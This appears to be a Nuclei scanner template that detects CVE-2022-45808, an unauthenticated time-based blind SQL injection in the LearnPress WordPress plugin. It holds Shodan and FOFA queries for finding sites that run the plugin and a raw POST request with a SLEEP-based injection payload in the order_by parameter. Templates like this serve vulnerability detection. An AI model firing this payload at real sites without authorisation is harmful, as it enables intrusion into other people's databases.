LearnPress Plugin < 4.2.0 - Unauthenticated Time-Based Blind SQLi

id: CVE-2022-45808

info:
  name: LearnPress Plugin < 4.2.0 - Unauthenticated Time-Based Blind SQLi
  author: DhiyaneshDK
  severity: critical
  description: |
    SQL Injection vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.
  reference:
    - https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-wordpress-lms-plugin-plugin-4-1-7-3-2-sql-injection?_s_id=cve
    - https://github.com/RandomRobbieBF/CVE-2022-45808
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
    cvss-score: 9.9
    cve-id: CVE-2022-45808
    cwe-id: CWE-89
    epss-score: 0.40021
    epss-percentile: 0.97133
    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/learnpress"
    fofa-query: body="/wp-content/plugins/learnpress"
    publicwww-query: /wp-content/plugins/learnpress
  tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,sqli,time-based-sqli,kev

http:
  - raw:
      - |
        POST /wp-json/lp/v1/courses/archive-course HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        c_search=X&order_by=ID AND (SELECT 1471 FROM (SELECT(SLEEP(6)))VcSO)&order=DESC&limit=10&return_type=html

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'contains_all(body, "status", "message")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402206ba451f4e8a8a74b0d61692595a89170c32620491af3118ac8872a735486c045022009380276ca40b8f76f2ebcb93c9e922dbaad1ae6483987b0ebff80bf7210e421:922c64590222798bb761d5b6d8e72950